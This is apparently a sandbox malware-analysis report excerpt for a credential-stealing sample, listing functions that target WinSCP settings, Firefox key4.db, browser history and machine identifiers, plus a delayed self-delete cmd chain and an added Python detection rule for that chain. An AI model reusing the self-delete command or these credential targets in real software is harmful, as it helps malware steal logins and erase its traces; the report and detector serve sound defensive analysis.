                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$Open
                                                                                                                                                                        • String ID: Software\Martin Prikryl\WinSCP 2\Configuration
                                                                                                                                                                        • API String ID: 276825008-2822339690
                                                                                                                                                                        • Opcode ID: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                        • Instruction ID: c250d11b6629f2eea65e49512af102c608c6350f49251a8cd05842a55814024d
                                                                                                                                                                        • Opcode Fuzzy Hash: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                        • Instruction Fuzzy Hash: 49116DB2D101286BE7109AA5DC49E9B7EBCEB85358F04042EF508D7241E6B59A44CBE4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 545 43e4ea-43e785 ShellExecuteEx memset ExitProcess
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                        • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                        • API String ID: 1852908831-902342072
                                                                                                                                                                        • Opcode ID: 46ce48e24009437e21ff09d38671e0a3c0e3ade84f6761fee6b6caae3fc326df
                                                                                                                                                                        • Instruction ID: b4fb451f398911565fd2404722d46166d5db542435d23226fa70abb328fa2d0a
                                                                                                                                                                        • Opcode Fuzzy Hash: 46ce48e24009437e21ff09d38671e0a3c0e3ade84f6761fee6b6caae3fc326df
                                                                                                                                                                        • Instruction Fuzzy Hash: AC710C35B002059FD740CF5CDC88DAA33E9EB8D608B19846AF849C7362EBB4AD148F49

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 581 43e5b7-43e763 ShellExecuteEx memset ExitProcess 596 43e767-43e785 581->596
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: ExecuteExitProcessShellmemset
• String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
• API String ID: 1852908831-902342072
• Opcode ID: b2c4268ca961e0fc47ca01dcb69c7324dda417456c1cdf6c9f2e484c6493fceb
• Instruction ID: bd544761f7b1dfedf4fb5736016b050abd727cb7d0c45f0a086215749ccf5ae6
• Opcode Fuzzy Hash: b2c4268ca961e0fc47ca01dcb69c7324dda417456c1cdf6c9f2e484c6493fceb
• Instruction Fuzzy Hash: 1341FA75B002059FD740CF5CDC88DAA33E9EF8D604B19852AF849C7362EBB4AD148F49
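The two string fragments this function concatenates around a directory name, `/c timeout /t 10 & rd /s /q "C:\ProgramData\` and `" & exit`, form a cmd.exe chain that sleeps, then recursively and quietly removes a directory under C:\ProgramData\, then exits; the API group for the function (Execute, ExitProcess, Shell, memset) is consistent with the result being handed to a shell while the caller terminates, which is the usual way to remove a working directory the calling process still occupies. Below is a process-creation rule for that chain, written as an added example: it is not code from the Joe Sandbox report or from the sample. Only the two fragments and the C:\ProgramData\ prefix come from the report; the Sysmon-like event fields (Image, CommandLine), every path and directory name, and the `rmdir` and `/nobreak` spellings the pattern also accepts are assumed or constructed for the demo.

```python
"""Flag the delayed self-delete shell chain reported for this function.

Added detection example; not code from the Joe Sandbox report or from the
analysed sample.  The only facts taken from the report are the two string
fragments the function concatenates around a directory name before handing
the result to a shell:
    /c timeout /t 10 & rd /s /q "C:\\ProgramData\\      and      " & exit
Event field names, file paths, directory names and the 'rmdir' / '/nobreak'
variants are assumed or constructed for the demo.
"""
import re
from typing import Dict, List, Optional

# Generalised form of the reported string: a cmd chain that sleeps N seconds,
# recursively and quietly removes one quoted directory, then exits.  Accepts
# 'rd' or its alias 'rmdir', an optional '/nobreak' on timeout, and /s /q in
# either order (assumed variants; the report shows only the 'rd /s /q' form).
SELF_DELETE_RE = re.compile(
    r'/c\s+timeout\s+/t\s+(?P<delay>\d+)(?:\s+/nobreak)?\s*&\s*'
    r'(?:rd|rmdir)\s+(?:/[sq]\s+){2}"(?P<target>[^"]+)"\s*&\s*exit\b',
    re.IGNORECASE,
)

# Prefix seen in the reported string (normalised to lower case, backslashes).
PROGRAMDATA = "c:\\programdata\\"


def parse_cmdline(cmdline: str) -> Optional[Dict]:
    """Return delay, target and a ProgramData flag for a self-delete chain, else None."""
    m = SELF_DELETE_RE.search(cmdline)
    if m is None:
        return None
    target = m.group("target")
    norm = target.replace("/", "\\").lower()   # tolerate forward slashes
    return {
        "delay": int(m.group("delay")),
        "target": target,
        # The report shows the target under C:\ProgramData\; treat that as the
        # high-confidence case and any other directory as worth a look.
        "under_programdata": norm.startswith(PROGRAMDATA),
    }


def scan(events: List[Dict]) -> List[Dict]:
    """Run parse_cmdline over process-creation events with Image and CommandLine.

    The match is on the command-line syntax rather than on Image, so a renamed
    copy of cmd.exe does not slip past; Image is kept in the hit for context.
    """
    hits = []
    for ev in events:
        parsed = parse_cmdline(ev.get("CommandLine", ""))
        if parsed is None:
            continue
        hits.append({
            **parsed,
            "image": ev.get("Image", ""),
            "severity": "high" if parsed["under_programdata"] else "medium",
        })
    return hits


# Constructed events in a Sysmon-like shape; the directory names are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c timeout /t 10 & rd /s /q "C:\ProgramData\AB12CD" & exit'},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'C:\Windows\SysWOW64\cmd.exe /c timeout /t 5 /nobreak & rmdir /q /s "C:\Users\user\AppData\Local\Temp\x1" & exit'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c timeout /t 10 & echo done'},            # benign: no delete
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c rd /s /q "C:\Build\out"'},              # benign: no delay/exit chain
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["severity"], hit["delay"], hit["target"])
```

The delay value (10 here) is specific to this build, so the pattern captures it instead of hard-coding it. Because `rd` leaves no file-level artefact of what it removed, the process-creation event with this command line is the telemetry to alert on; correlating it with a parent process that exits within the captured delay, and with the dropped-file list elsewhere in this report, tells you which directory was cleaned.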

Control-flow Graph
• Nodes: 598 = 431366-4313b1 (RegQueryValueExA); 600 = 4313ba-4313d4. Edges: 598->600
APIs
• RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 004313AA
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID: " $CurrentBuildNumber$^\w$^\w
• API String ID: 3660427363-3261598234
• Opcode ID: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
• Instruction ID: 0d34f9e0d8b49bd60d604e6c48f6b3b48a5b9a3a064a98a57d4dcc57e91ac9fb
• Opcode Fuzzy Hash: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
• Instruction Fuzzy Hash: 9CF01879641110BFD214DF44DC89EA5B7BCEF55710F144869F948D7320EA64BC118A66

Control-flow Graph
• Nodes: 607 = 42764a-427845 (call 43335d); 624 = 427847-4278be (StrCmpCA). Edges: 607->624
APIs
• StrCmpCA.SHLWAPI(00000000,firefox), ref: 004278A6
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID:
• String ID: Stable\$firefox
• API String ID: 0-3160656979
• Opcode ID: 50adfbb396ac6d38a52d3669ed2107846ae3f003892b1e5c21602bac3e31a4da
• Instruction ID: 01410d69d90083381b27eb376952c09bc6d19c9c6413179d456c2d90a18a2a64
• Opcode Fuzzy Hash: 50adfbb396ac6d38a52d3669ed2107846ae3f003892b1e5c21602bac3e31a4da
• Instruction Fuzzy Hash: 04815D79A005089FCB04DF9CCC80E99B3B5FF88214B08855AEC25DB3A5EBB0ED55CB95

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 629 41f72b-41f845 DeleteFileA 641 41f849-41f871 629->641
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041F83C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
Similarity
• API ID: DeleteFile
• String ID: 0$_history.db
• API String ID: 4033686569-775750150

APIs
• FindNextFileA.KERNELBASE(?,?), ref: 0041ECE7
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFindNext
• String ID: 0$ 0
• API String ID: 2029273394-2612948726

APIs
• memset.MSVCRT ref: 004324EB
• RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 00432530
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Openmemset
• String ID: SOFTWARE\Microsoft\Cryptography
• API String ID: 180050240-1514646153

APIs
• RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00431F79
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
• String ID: %s\%s$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 71445658-1969869098

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
• InternetOpenA.WININET ref: 0043D66B
• InternetOpenA.WININET ref: 0043D698
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen$CreateDirectory
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1348255353-0
                                                                                                                                                                        • Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                        • Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                        • Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004396D5
                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004396FD
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043972A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3134562156-0
                                                                                                                                                                        • Opcode ID: b3d90610b9195dac72c709298b4d1c9adf65b200eefc6054539c43cd9a4c3987
                                                                                                                                                                        • Instruction ID: 588a6b5fa3018ceda42b82e9f50853577ca3412cc21646889486619c5310e784
                                                                                                                                                                        • Opcode Fuzzy Hash: b3d90610b9195dac72c709298b4d1c9adf65b200eefc6054539c43cd9a4c3987
                                                                                                                                                                        • Instruction Fuzzy Hash: A8510A767005148FCB68CF9CDCC1D9973F6BF98204B190658E806D73A2EAF0AD45CB66
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042068C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: \key4.db
                                                                                                                                                                        • API String ID: 1304948518-2908133219
                                                                                                                                                                        • Opcode ID: e0433a541a2c475e30d8dcb9ab7be8879f98edb69430bb3f411822e8431edecb
                                                                                                                                                                        • Instruction ID: f8ad27eb764bb7d653a7dedd4b6e847b451d7ab0834d48651a41f815581897d5
                                                                                                                                                                        • Opcode Fuzzy Hash: e0433a541a2c475e30d8dcb9ab7be8879f98edb69430bb3f411822e8431edecb
                                                                                                                                                                        • Instruction Fuzzy Hash: 60713DB6712A009FD704CFACED94D9DBBF5FF982007084128E845D7321EAB9AE15CB49
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F3DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1304948518-4000257214
                                                                                                                                                                        • Opcode ID: e17b1741426e9313217d84596e32e9c1bbcd7d25749ea705ad0b83eb9b6e5613
                                                                                                                                                                        • Instruction ID: 2ed104a452e55bb280be84cde6660138d5eb36ab6efed2b3cd32ffde3ac5a87e
                                                                                                                                                                        • Opcode Fuzzy Hash: e17b1741426e9313217d84596e32e9c1bbcd7d25749ea705ad0b83eb9b6e5613
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F415076B001109FCB45DF9CDCA1AED73F1BF89704B084579E519E3361EBB0AA158B4A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F6B5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
